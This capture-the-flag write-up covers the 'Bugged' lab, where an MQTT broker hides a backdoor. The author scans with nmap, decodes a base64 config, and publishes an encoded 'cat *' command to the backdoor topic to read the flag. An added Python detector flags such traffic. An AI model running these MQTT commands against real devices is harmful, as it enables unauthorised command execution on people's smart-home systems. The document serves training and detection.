CTF Bugged

  1. Note
  2. nmap
  3. Documentation
  4. Get base64 string
  5. Send a command
    1. Subscriber
    2. Publisher
    3. Decode it
  6. Use the backdoor
  7. Flag

Note

John was working on his smart home appliances when he noticed weird traffic going across the network. Can you help him figure out what these weird network communications are?

nmap

nmap -A -sV -p- 10.10.85.233 

Output:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-07 19:03 CET
Nmap scan report for 10.10.85.233
Host is up (0.034s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE                  VERSION
1883/tcp open  mosquitto version 2.0.14
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|     $SYS/broker/messages/received: 59
|     patio/lights: {"id":9498615153902037727,"color":"RED","status":"OFF"}
|     $SYS/broker/version: mosquitto version 2.0.14
|     $SYS/broker/shared_subscriptions/count: 0
|     $SYS/broker/load/publish/dropped/15min: 0.00
|     $SYS/broker/load/sockets/1min: 3.22
|     $SYS/broker/bytes/sent: 3994
|     $SYS/broker/clients/inactive: 0
|     $SYS/broker/load/messages/sent/15min: 7.77
|     $SYS/broker/load/publish/sent/5min: 11.59
|     $SYS/broker/load/sockets/15min: 0.26
|     $SYS/broker/clients/connected: 2
|     $SYS/broker/load/bytes/received/5min: 540.82
|     $SYS/broker/load/messages/sent/5min: 22.75
|     $SYS/broker/clients/total: 2
|     $SYS/broker/load/publish/received/15min: 0.00
|     $SYS/broker/uptime: 33 seconds
|     $SYS/broker/subscriptions/count: 3
|     $SYS/broker/publish/bytes/received: 1981
|     $SYS/broker/messages/sent: 142
|     $SYS/broker/store/messages/bytes: 296
|     $SYS/broker/load/publish/dropped/1min: 0.00
|     $SYS/broker/clients/active: 2
|     $SYS/broker/load/messages/received/15min: 3.86
|     $SYS/broker/store/messages/count: 52
|     $SYS/broker/load/publish/sent/15min: 3.91
|     $SYS/broker/publish/messages/dropped: 0
|     $SYS/broker/clients/disconnected: 0
|     $SYS/broker/publish/bytes/sent: 675
|     $SYS/broker/publish/messages/received: 0
|     $SYS/broker/publish/messages/sent: 84
|     $SYS/broker/load/sockets/5min: 0.76
|     livingroom/speaker: {"id":4007409197343670969,"gain":45}
|     $SYS/broker/load/publish/sent/1min: 53.91
|     $SYS/broker/load/bytes/sent/15min: 189.97
|     $SYS/broker/load/publish/received/5min: 0.00
|     $SYS/broker/load/bytes/received/15min: 187.07
|     $SYS/broker/load/bytes/sent/5min: 561.92
|     $SYS/broker/load/publish/received/1min: 0.00
|     $SYS/broker/clients/maximum: 2
|     $SYS/broker/load/publish/dropped/5min: 0.00
|     $SYS/broker/bytes/received: 2859
|     $SYS/broker/load/messages/received/1min: 45.29
|     kitchen/toaster: {"id":14194221257404514717,"in_use":false,"temperature":153.88422,"toast_time":272}
|     yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config: eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
|     $SYS/broker/load/messages/sent/1min: 99.20
|     $SYS/broker/messages/stored: 52
|     $SYS/broker/load/messages/received/5min: 11.17
|     $SYS/broker/load/connections/5min: 0.58
|     $SYS/broker/load/connections/1min: 2.46
|     $SYS/broker/load/bytes/sent/1min: 2587.53
|     $SYS/broker/retained messages/count: 51
|     $SYS/broker/clients/expired: 0
|     $SYS/broker/load/bytes/received/1min: 2188.79
|     $SYS/broker/load/connections/15min: 0.20
|_    storage/10.10.85.233thermostat: {"id":2291235996486415869,"temperature":23.365356}

Port 1883 is open and runs mosquitto version 2.0.14, an MQTT broker.
Nmap's mqtt-subscribe script also lists the topics on the broker together with their most recent payloads.

Documentation

https://cs.pomona.edu/classes/po181u/docs/labs/lab4/

I have to install mosquitto:

sudo pacman -S mosquitto
  1. mosquitto_pub : for publishing to MQTT servers
  2. mosquitto_sub : for subscribing to MQTT servers
    -h : mqtt host to connect to. Defaults to localhost
    -t : mqtt topic to publish/subscribe to
    -m : mqtt message body for publication
    -v : print published messages verbosely

Get base64 string

I'm looking at all the data with mosquitto_sub.

mosquitto_sub -h 10.10.85.233 -t "#"

echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ== |base64 -d

Output:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","registered_commands":["HELP","CMD","SYS"],"pub_topic":"U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub","sub_topic":"XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"}

The ID is: cdd1b1c0-1c40-4b0f-8e22-61b357548b7d
registered_commands: CMD should be useful for us.
pub_topic: U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub
sub_topic: XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub

Now we can try to publish a command. We also need to keep a subscriber listening so we can see the reply.

Send a command

Subscriber

mosquitto_sub -h 10.10.85.233 -t "#" 

Publisher

mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eqrgijkosrgfuheqrguirgequi"

Decode it

echo SW52YWxpZCBtZXNzYWdlIGZvcm1hdC4KRm9ybWF0OiBiYXNlNjQoeyJpZCI6ICI8YmFja2Rvb3IgaWQ+IiwgImNtZCI6ICI8Y29tbWFuZD4iLCAiYXJnIjogIjxhcmd1bWVudD4ifSk= |base64 -d

Output:

Invalid message format.
Format: base64({"id": "<backdoor id>", "cmd": "<command>", "arg": "<argument>"})%  

Use the backdoor

We need to encode the command in base64.

echo '{"id": "4879005204976514238", "cmd": "CMD", "arg": "cat *"}' |base64

Output:

eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAq
In0K

This will be our message.

mosquitto_pub -h 10.10.85.233 -t "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub" -m "eyJpZCI6ICI0ODc5MDA1MjA0OTc2NTE0MjM4IiwgImNtZCI6ICJDTUQiLCAiYXJnIjogImNhdCAqIn0K"

Flag

echo eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9 |base64 -d

Output:

{"id":"cdd1b1c0-1c40-4b0f-8e22-61b357548b7d","response":"flag{18d44fc0707ac8dc8be45bb83db54013}\n"}
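As an added example (not part of this writeup or of the room), here is a small Python detector for the pattern the whole room turns on: a backdoor that announces itself on a retained topic with a random-looking name and a base64-wrapped JSON config, then takes base64-wrapped JSON commands on sub_topic. The script parses the "topic: payload" lines of nmap's mqtt-subscribe output, decodes base64 JSON, flags the config beacon with its registered commands and control topics, classifies command and response envelopes in the format the backdoor documents, and marks topic names whose segments look generated. The nmap lines and the response payload are copied from this page; the command envelope uses the placeholder id and argument from the documented format, the assumption that responses arrive on pub_topic is mine, and the entropy thresholds are my choice.

```python
import base64
import binascii
import json
import math
from typing import Optional

# Constructed sample: three retained-topic lines copied from the nmap
# mqtt-subscribe output in this writeup, in nmap's "|     topic: payload" layout.
NMAP_SNIPPET = """\
|     patio/lights: {"id":9498615153902037727,"color":"RED","status":"OFF"}
|     kitchen/toaster: {"id":14194221257404514717,"in_use":false,"temperature":153.88422,"toast_time":272}
|     yR3gPp0r8Y/AGlaMxmHJe/qV66JF5qmH/config: eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==
"""

# Constructed sample of live traffic on the control topics: a command envelope
# built from the format the backdoor documents (placeholder id and argument),
# and the response payload from the writeup, which I assume arrives on pub_topic.
OBSERVED = [
    ("XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub",
     base64.b64encode(b'{"id": "<backdoor id>", "cmd": "CMD", "arg": "<argument>"}').decode()),
    ("U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub",
     "eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlc3BvbnNlIjoiZmxhZ3sxOGQ0NGZjMDcwN2FjOGRjOGJlNDViYjgzZGI1NDAxM31cbiJ9"),
]

def parse_mqtt_subscribe(output: str) -> list:
    """Turn the '|     topic: payload' lines of nmap's mqtt-subscribe script
    into (topic, payload) pairs; lines without a 'topic: payload' split are skipped."""
    pairs = []
    for line in output.splitlines():
        body = line.lstrip("|_ ").strip()
        if ": " not in body:
            continue
        topic, payload = body.split(": ", 1)
        pairs.append((topic, payload))
    return pairs

def decode_b64_json(payload: str) -> Optional[dict]:
    """Return the JSON object hidden in a base64 payload, or None when the
    payload is not valid base64 or does not decode to a JSON object."""
    try:
        obj = json.loads(base64.b64decode(payload, validate=True))
    except (binascii.Error, ValueError):
        return None
    return obj if isinstance(obj, dict) else None

def segment_entropy(segment: str) -> float:
    """Shannon entropy in bits per character of one topic path segment."""
    n = len(segment)
    counts = {c: segment.count(c) for c in set(segment)}
    return -sum(k / n * math.log2(k / n) for k in counts.values()) if n else 0.0

def looks_random(topic: str, min_len: int = 10, min_bits: float = 3.0) -> bool:
    """True when any path segment is long, mixed-case and high-entropy, which is
    what the generated control-topic names in this room look like (thresholds
    are my choice; tune them against your own topic namespace)."""
    for seg in topic.split("/"):
        mixed = any(c.islower() for c in seg) and any(c.isupper() for c in seg)
        if len(seg) >= min_len and mixed and segment_entropy(seg) >= min_bits:
            return True
    return False

def classify(topic: str, payload: str) -> dict:
    """Classify one message: plain JSON is device telemetry; base64-wrapped
    JSON is matched against the three shapes the backdoor uses."""
    finding = {"topic": topic, "kind": "other", "random_topic": looks_random(topic)}
    obj = decode_b64_json(payload)
    if obj is None:
        try:
            json.loads(payload)
            finding["kind"] = "telemetry"
        except ValueError:
            pass
        return finding
    if "registered_commands" in obj and "sub_topic" in obj:
        finding["kind"] = "backdoor_config"
        finding["commands"] = list(obj["registered_commands"])
        finding["control_topics"] = [obj["sub_topic"], obj.get("pub_topic")]
    elif "cmd" in obj:
        finding["kind"] = "backdoor_command"
        finding["cmd"], finding["arg"] = obj["cmd"], obj.get("arg", "")
    elif "response" in obj:
        finding["kind"] = "backdoor_response"
        finding["response"] = obj["response"]
    else:
        finding["kind"] = "encoded_json"
    return finding

def scan(messages) -> list:
    """Return the findings worth alerting on: anything that is not plain
    telemetry, plus any message on a random-looking topic. Broker statistics
    under $SYS/ are skipped because they are not device messages."""
    findings = [classify(t, p) for t, p in messages if not t.startswith("$SYS/")]
    return [f for f in findings if f["kind"] != "telemetry" or f["random_topic"]]

SAMPLE_MESSAGES = parse_mqtt_subscribe(NMAP_SNIPPET) + OBSERVED

if __name__ == "__main__":
    for f in scan(SAMPLE_MESSAGES):
        print(json.dumps(f))
```

Run against the sample, scan() returns exactly three findings: the config beacon (with HELP, CMD and SYS and both control topics), the command envelope and the response, while the patio and kitchen telemetry is ignored. The same function can be fed the output of `mosquitto_sub -v -t "#"` split on the first space, so a broker owner gets an alert the moment an unknown device registers a "CMD" handler on a generated topic.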